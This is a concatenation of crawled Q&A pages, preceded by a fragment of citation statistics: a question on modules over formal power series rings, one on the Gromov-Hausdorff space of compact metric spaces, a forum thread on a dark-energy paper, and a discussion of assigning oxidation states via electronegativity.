Series B 4 Applied Mathematics Letters 4 Journal of Integral Equations and Applications 4 SIAM Journal on Mathematical Analysis 4 Journal of Mathematical Sciences (New York) 4 Turkish Journal of Mathematics 4 Abstract and Applied Analysis 4 European Journal of Mechanics. B. Fluids 4 Communications in Nonlinear Science and Numerical Simulation 4 Journal of Applied Mathematics 4 Communications on Pure and Applied Analysis 4 International Journal of Computational Methods 4 International Journal of Numerical Analysis and Modeling 4 Mathematical Modelling of Natural Phenomena 4 GEM - International Journal on Geomathematics 4 Mathematical Control and Related Fields 4 European Series in Applied and Industrial Mathematics (ESAIM): Proceedings and Surveys 4 Results in Applied Mathematics 3 Acta Mechanica 3 Indian Journal of Pure & Applied Mathematics 3 Journal of Engineering Mathematics 3 Acta Applicandae Mathematicae 3 Acta Mathematicae Applicatae Sinica. English Series 3 Calculus of Variations and Partial Differential Equations 3 Complexity 3 Optimization Methods & Software 3 Journal of Inequalities and Applications 3 Chaos 3 Journal of Mathematical Fluid Mechanics 3 Mathematical Modelling and Analysis 3 Archives of Computational Methods in Engineering ...and 137 more Journals all top 5 #### Cited in 44 Fields 1,494 Numerical analysis (65-XX) 786 Partial differential equations (35-XX) 594 Fluid mechanics (76-XX) 257 Mechanics of deformable solids (74-XX) 235 Calculus of variations and optimal control; optimization (49-XX) 84 Optics, electromagnetic theory (78-XX) 81 Biology and other natural sciences (92-XX) 55 Ordinary differential equations (34-XX) 48 Operations research, mathematical programming (90-XX) 42 Integral equations (45-XX) 41 Classical thermodynamics, heat transfer (80-XX) 41 Systems theory; control (93-XX) 37 Linear and multilinear algebra; matrix theory (15-XX) 33 Operator theory (47-XX) 32 Computer science (68-XX) 29 Probability theory and stochastic processes (60-XX) 28 Statistical mechanics, structure of matter (82-XX) 27 Geophysics (86-XX) 24 Approximations and expansions (41-XX) 19 Real functions (26-XX) 16 Functional analysis (46-XX) 15 Statistics (62-XX) 15 Information and communication theory, circuits (94-XX) 10 Global analysis, analysis on manifolds (58-XX) 8 Dynamical systems and ergodic theory (37-XX) 8 Harmonic analysis on Euclidean spaces (42-XX) 8 Game theory, economics, finance, and other social and behavioral sciences (91-XX) 7 Quantum theory (81-XX) 6 Special functions (33-XX) 5 Mechanics of particles and systems (70-XX) 5 Astronomy and astrophysics (85-XX) 4 Field theory and polynomials (12-XX) 4 Integral transforms, operational calculus (44-XX) 3 Functions of a complex variable (30-XX) 3 Differential geometry (53-XX) 2 History and biography (01-XX) 2 Difference and functional equations (39-XX) 1 Number theory (11-XX) 1 Measure and integration (28-XX) 1 Potential theory (31-XX) 1 Several complex variables and analytic spaces (32-XX) 1 Convex and discrete geometry (52-XX) 1 General topology (54-XX) 1 Relativity and gravitational theory (83-XX)
2021-09-23 09:55:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5729230046272278, "perplexity": 8028.348383367742}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057417.92/warc/CC-MAIN-20210923074537-20210923104537-00472.warc.gz"}
https://math.stackexchange.com/questions/2002058/modules-over-ring-of-formal-power-series
# Modules over ring of formal power series I am facing the following question: Let $K$ be a commutative unital ring (can be taken to be $\mathbb{R}$ or $\mathbb{C}$), and let $K[[\lambda]]$ be the associated ring of formal power series. I know that if $M$ is a $K$-module, then $M[[\lambda]]$ inherits a natural $K[[\lambda]]$-module structure. The question is, what condition ensures that a given $K[[\lambda]]$-module, say ${\cal M}$, to be of the form $M_0[[\lambda]],$ for some $K$-module $M_0$? I found the answer in the paper "Algebraic cohomology and deformation theory" of M. Gerstenhaber and D. Schack, published in the book "Deformation theory of algebras and structures and application". There it is just stated, without proof, the following: A $K[[\lambda]]$-module ${\cal M}$ is of the form $M_0[[\lambda]]$ if an only if ${\cal M}$ is $\lambda$-adically complete and $\lambda$-torsion free, in wich case $M_0 = {\cal M}/\lambda{\cal M}.$ Trying to prove the "if" part, I consider the following map $$M_0[[\lambda]]\rightarrow {\cal M};\ \ \sum_{j=0}^\infty\lambda^j[x]_j\mapsto\sum_{j=0}^\infty\lambda^jx_j.$$ Then, the series in ${\cal M}$ converges, due to the $\lambda$-adic completeness of ${\cal M},$ for any choice of the representant $x_j$ of $[x]_j,$ yet, I can't prove that the limit is independent of the representant. I suppose that can be shown using the $\lambda$-torsion free property, but then I realised that I don't even have a clear idea of what exactly does that property mean. So, now my question is: What is the definition of a $\lambda$-torsion free $K[[\lambda]]$-module? Also, the map proposed above is the "natural one" for me. But I am not sure that is the right one to solve the problem. Perhaps, one I get the right definition of a $\lambda$-torsion free module, I can decide if the map is the needed one. Thanks in advance for any help. • If $r\in R$ and $M$ is an $R$-module, the $r$-torsion in $M$ is the set of nonzero elements such that $rm=0$, and $M$ is $r$-torsion free if there is no $r$ torsion. Phrased differently, $M$ is $r$-torsion free if the map $r:M\to M$ given by multiplication by $r$ is an injection. – Aaron Nov 10 '16 at 20:26 • That seems a reasonable definition, may you tell me where did you take it from? Also, adapting that definition when $I\subset R$ is an ideal could be that: $0\neq x\in M$ is an $I$-torsion element if $Ix = 0$? And thus the Module $M$ would be $I$-torsion free if it has no $I$-torsion elements. Anyway, if that is the right definition, it seems that the map I proposed to prove the assertion I am interested in does not work. – Inocencio Nov 11 '16 at 18:48 • Not where I got the definition, but you should look here. In particular, they define $S$-torsion for $S$ a multiplicatively closed set (not necessarily an ideal), and it's not that all of $S$ annihilates $m$, but rather that some $s\in S$ does. This definition seems useful when talking about localization. – Aaron Nov 11 '16 at 19:10
2019-05-25 07:49:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.917498767375946, "perplexity": 128.95613241945665}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232257920.67/warc/CC-MAIN-20190525064654-20190525090654-00038.warc.gz"}
https://mathoverflow.net/questions/161529/the-space-of-all-compact-metric-spaces-with-gromov-hausdorff-distance
# The space of all compact metric spaces with Gromov-Hausdorff distance Given two metric spaces $(X_1,d_1),(X_2,d_2)$ one can define $d_{GH}(X_1,X_2)$---the Gromov Hausdorff distance between them. It appears to be $0$ iff $X_1$ and $X_2$ are isometric. One can therefore form the space $\mathcal{X}$ of all (classes of) compact metric spaces. I would like to know whether there is some model for this space i.e. metric space $Y$ which is homeomorphic (or better isometric) to $\mathcal{X}$. • Since a compact metric space has at most the cardinality of the continuum, one could simply pick one isometric copy of each compact metric space in which the points are real numbers and this set with the Gromov-Hausdorff distance is a proper metric space. – Michael Greinecker Mar 26 '14 at 22:16 • @MichaelGreinecker: I think the question is whether $\mathcal{X}$ is homeomorphic/isometric to some more familiar or more easily constructed metric space. – Nate Eldredge Mar 26 '14 at 23:52 • Is it at least known that the space of compact metric spaces modulo isometry is separable? This reminds me of a similar result of Pisier asserting that for each $n\geqslant 2$ the space of $n$-dimensional operator spaces, $O_n$, is non-separable. I am wondering if one could embed $O_n$ in your space. – Tomek Kania Oct 18 '14 at 20:54 • I believe the set of finite metric spaces with pairwise rational distances is dense in the Gromov-Hausdorff space of compact metric spaces. – Noah Schweber Jul 27 '15 at 19:11 • @NoahSchweber Yes, that looks correct. You can post it as an answer. – nbarto Oct 4 '18 at 11:48
2019-02-21 00:34:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9239084720611572, "perplexity": 232.1781473477266}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247496855.63/warc/CC-MAIN-20190220230820-20190221012820-00445.warc.gz"}
https://www.physicsforums.com/threads/dark-energy-myths-and-reality.244790/
# Dark energy myths and reality 1. Jul 13, 2008 ### wolram arXiv:0807.1635 [ps, pdf, other] Title: Dark energy: myths and reality Authors: V.N. Lukash (Astro Space Centre of P.N. Lebedev Physical Institute, Moscow, Russia), V.A. Rubakov (Institute for Nuclear Research, Moscow, Russia) Journal-ref: Physics-Uspekhi 51 (3), pp. 283-289 (2008) Subjects: Astrophysics (astro-ph) We discuss the questions related to dark energy in the Universe. We note that in spite of the effect of dark energy, large-scale structure is still being generated in the Universe and this will continue for about ten billion years. We also comment on some statements in the paper Dark energy and universal antigravitation'' by A.D. Chernin [4] 2. Jul 13, 2008 ### jonmtkisco Hi wolram, Nice paper from Lukash & Rubikov, thanks for bringing it to our attention. It sure throws cold water on Chernin's conclusions. Unusually strong critisism. If I understand the gist of the paper, it is saying that large scale structure formation can continue for another 10 Gy or so into the future, despite the retarding influence of dark energy. So for example, even if most superclusters are currently expanding, their expansion rate may have already slowed sufficiently that it is possible they will experience true gravitational collapse some Gy in the future, when their expansion rate actually turns negative. So in that sense a supercluster might be considered "gravitationally bound" at present even though most of its galaxies currently are moving farther apart. An interesting point to keep in mind when interpreting Integrated Sachs-Wolfe observations. Although Lukash & Rubikov want to keep the door open for quintessence and higher-dimension theories of dark energy, that section seems like a fairly cursory tangent away from their main point. Jon
2018-05-23 13:23:56
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.25291338562965393, "perplexity": 2822.057344848395}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794865651.2/warc/CC-MAIN-20180523121803-20180523141803-00039.warc.gz"}
https://chemistry.stackexchange.com/questions/10944/electronegativity-considerations-in-assigning-oxidation-states
# Electronegativity Considerations in Assigning Oxidation States I have never seen anything other than a set of rules like these when textbooks present how to assign oxidation numbers. Such as these: However, if we keep in mind that oxidation numbers are simply imaginary numbers which suppose all bonding to be ionic - i.e. not electron sharing - and if we keep in mind simply relative electronegativity, we can easily work out the oxidation state of any element in any compound. For example, take water. Bonding order: $\ce{H-O-H}$. Oxygen has two lone pairs. Oxygen is more electronegative than hydrogen. So we suppose that oxygen takes both electrons in both bonding pairs. Oxygen has 8 electrons. Its valence is 6. 6-8 is -2; oxygen has two more electrons assigned to it than what it has in its valence, so naturally its oxidation state is negative 2. No rules needed. Now hydrogen peroxide. $\ce{H-O-O-H}$. Here we have an oxygen-oxygen bond so in this case, neither element wins the electronegativity battle. Electrons are split between the oxygen and the oxygen. However, since the oxygens are much more electronegative than the hydrogens, we assign both electrons in both the $\ce{O-H}$ bonding pairs to oxygen. Oxygen has 7 electrons assigned to it; oxygen has a valence of 6; oxidation state: -1. No need to memorize exceptions as stated in the table above. We could go on. However, I am curious: 1) Has anyone been taught to assign oxidation states this way? 2) If not, what do you think of this method? • I have, the table came afterwards as an aid to quickly assign alkali and alkaline earth metals, oxygen and halides. – LDC3 May 20 '14 at 3:16 • I don't think I was taught that way but it's the way I use. I think oxidation numbers are a lot easier than how they are taught in high school. – canadianer May 20 '14 at 4:41 • I agree. Memorization is crap. EN isn't that hard and I remember I was taught to memorize the EN trend in high school. However, we were still taught how to assign oxidation numbers through memorizing a bunch of rules. Unfortunate that teachers can't put two and two together. – Dissenter May 20 '14 at 4:53 The electronegativity battle scheme is most helpful for all kinds of compounds since it is the most generic way to derive oxidation states. The table represents just a cheat sheet that might be very helpful in the beginning. If you are spending most of your time with chemistry, this table will be present as some sort of muscle memory - usually referred to as chemical intuition. The IUPAC defines oxidation states in their goldbook as follows: A measure of the degree of oxidation of an atom in a substance. It is defined as the charge an atom might be imagined to have when electrons are counted according to an agreed-upon set of rules: 1. the oxidation state of a free element (uncombined element) is zero; 2. for a simple (monatomic) ion, the oxidation state is equal to the net charge on the ion; 3. hydrogen has an oxidation state of 1 and oxygen has an oxidation state of -2 when they are present in most compounds. (Exceptions to this are that hydrogen has an oxidation state of -1 in hydrides of active metals, e.g. $\ce{LiH}$, and oxygen has an oxidation state of -1 in peroxides, e.g. $\ce{H2O2}$; 4. the algebraic sum of oxidation states of all atoms in a neutral molecule must be zero, while in ions the algebraic sum of the oxidation states of the constituent atoms must be equal to the charge on the ion. For example, the oxidation states of sulfur in $\ce{H2S}$, $\ce{S8}$ (elementary sulfur), $\ce{SO2}$, $\ce{SO3}$, and $\ce{H2SO4}$ are, respectively: -2, 0, +4, +6 and +6. The higher the oxidation state of a given atom, the greater is its degree of oxidation; the lower the oxidation state, the greater is its degree of reduction. What we see is, that your table actually reflects some of these rules. However, this set is not generic at all and it lacks a definition for compounds that do not contain oxygen or hydrogen, are elemental or monoatomic ions. With only these rules it is impossible do determine the oxidation states for $\ce{BF3}$ and [many]$_{n~(n\to\infty)}$ compounds. The lack of the definition is very well known - but not surprisingly the IUPAC has not changed the official set. Hans-Peter Loock proposed a much simpler concept in Expanded Definition of the Oxidation State: The oxidation state of an atom in a compound is given by the hypothetical charge of the corresponding atomic ion that is obtained by heterolytically cleaving its bonds such that the atom with the higher electronegativity in a bond is allocated all electrons in this bond. Bonds between like atoms (having the same formal charge) are cleaved homolytically. This is not a new definition, but it predates the IUPAC rules by several decades. For example, Linus Pauling provided a similar definition of the oxidation state in his 1947 edition of General Chemistry (3). (3):Pauling, L. General Chemistry; Freeman: San Francisco, CA, 1947.republished by Courier Dover Publications, 2012 So to me it is completely unclear, why IUPAC has chosen a different definition. • I reused that for the tag-wiki entry oxidation-state. – Martin - マーチン May 20 '14 at 6:43 • Thank you. It is unclear to me too why the IUPAC definition is this vague as well. – Dissenter May 20 '14 at 17:40 My apologies for bumping an old question; however I'm not sure that the accepted answer provides an adequate answer to the stated question: 1) Has anyone been taught to assign oxidation states this way? 2) If not, what do you think of this method? For part 1, I can say personally that I use this method in teaching a 3rd year Inorganic Chemistry course. It is covered in Rayner-Canham's Descriptive Inorganic Chemistry textbook (Chapter 8 of the 5th edition). After teaching this method for a number of years, I have anecdotal evidence that students get a better understanding of what the oxidation state is, and when it is suitable to use this type of electron bookkeeping instead of formal charge (for example). In addition to relying on a periodic trend as opposed to a list of rules, this method helps to explain the differences in the oxidation numbers of inequivalent atoms in ions/molecules (such as sulfur in $\ce{S2O3^2-}$), which can't be done with the list-of-rules approach. For part 2 of the question, the biggest drawback of using the electronegativity approach to determining oxidation numbers is that it requires a knowledge of lewis dot structures. With the current (American) General Chemistry track, students learn about oxidation numbers prior to drawing structures, and therefore must be taught using the list-of-rules approach. I suspect a shuffling of the content to allow students to use the electronegativity approach would have some pedagogical benefits; instead of sitting at the bottom of Bloom's Taxonomy with remembering a list of rules, we can move up to applying the electronegativity trends to analyze the degree of electron deficiency of an atom has in an ion or molecule. • I do not understand your last paragraph. Are you saying that students learn how to assign oxidation numbers before learning about the structure of the molecule which they are assigning the oxidation numbers to? How can that approach even remotely work? – Martin - マーチン Jul 16 '15 at 9:00 • @Martin-マーチン students typically learn how to determine the oxidation number of atoms in polyatomic ions based on the "rules". They know the chemical formula of the ion, but they have not encountered Lewis dot structures. So they can use the rules to determine that the N in nitrate has an oxidation state of +5 before they learn how to determine whether it is trigonal pyramidal or trigonal planar. – bobthechemist Jul 16 '15 at 11:56 • But then I don't see how considering the electronegativity instead of the rules would change anything. The procedure mostly stays the same. – Martin - マーチン Jul 16 '15 at 12:24 • @Martin-マーチン That's my point, gen chem students learn all that is needed to apply electronegativity to ox numder assignments, just in the wrong order. Therefore, it is only useful (with the current standard US curriculum) later on in the chemistry program. – bobthechemist Jul 16 '15 at 14:29 • I don't want to go into a deep conversation about the topic in the comments, but I really do not understand. What is the wrong order? Do students learn the set of rules to assign ox numbers prior to electronegativity? I just want to understand why there is a problem teaching the far superior approach instead of a fixed and incomplete set of rules. I am not even starting to question that they are taught a concept of bookkeeping of electrons before learning about molecular structures. If you want to talk about this, consider creating a chat room where we can talk. – Martin - マーチン Jul 16 '15 at 14:53
2019-04-23 07:56:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6587880253791809, "perplexity": 834.2486146921112}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578596541.52/warc/CC-MAIN-20190423074936-20190423100936-00479.warc.gz"}